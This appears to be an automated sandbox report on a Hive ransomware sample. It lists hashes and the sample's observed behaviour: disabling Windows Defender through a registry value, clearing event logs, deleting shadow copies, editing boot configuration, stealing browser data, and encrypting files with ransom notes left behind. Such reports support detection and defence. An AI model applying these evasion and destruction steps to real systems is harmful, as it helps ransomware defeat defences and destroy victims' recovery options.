Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-x5lm5adgdn
Target c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.7z
SHA256 1cba1a291ce919947f88133cd5e57177a1a1585fcb91bc39f61fabccf52ca76a
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1cba1a291ce919947f88133cd5e57177a1a1585fcb91bc39f61fabccf52ca76a

Threat Level: Known bad

The file c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Deletes Windows Defender Definitions

Hive

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Interacts with shadow copies

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 19:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win7-en-20211208

Max time kernel

182s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_IP1QxnAExbA0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_nYvWBHUVz2k0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_x8wScbWpV0A0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_q7mDP58Ue640.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_ppJWokR7gNc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_9znLbMUVkOw0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_L0jB_2BzHVE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_CsxtEScqIOc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_OLHdCQs6qlM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_5oAyYdFdhGs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_zcaawo9I91I0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_t8ybF_woHpI0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dpTWGEB2zlo0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_HguxSk5_qJQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_eAoPrwCmf6M0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1NUNv85SfKE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_H9Sw2I-NhPQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\ja-JP\sbdrop.dll.mui C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_aHyk0Cx-EoY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_Rz7rbldeanM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_7VYzzCb49Bc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_r1JsYqjHkfQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_fyyKrIIjZhw0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1S0DkVNFyJE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dG0Y2VLVPZU0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_gNJm2LdGyeE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1tc5K1JFgj00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_MfOITshG0C40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_4qfVfFrBGDc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_EKm8KedZVac0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_xvsftD7L4eE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_LFS10E66NZI0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_RQmmA2AZqb40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1LEJ-ivifeA0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_S6nEgIoxBnA0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_i6rkMkgC6hE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_POsspnLpQio0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 844 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
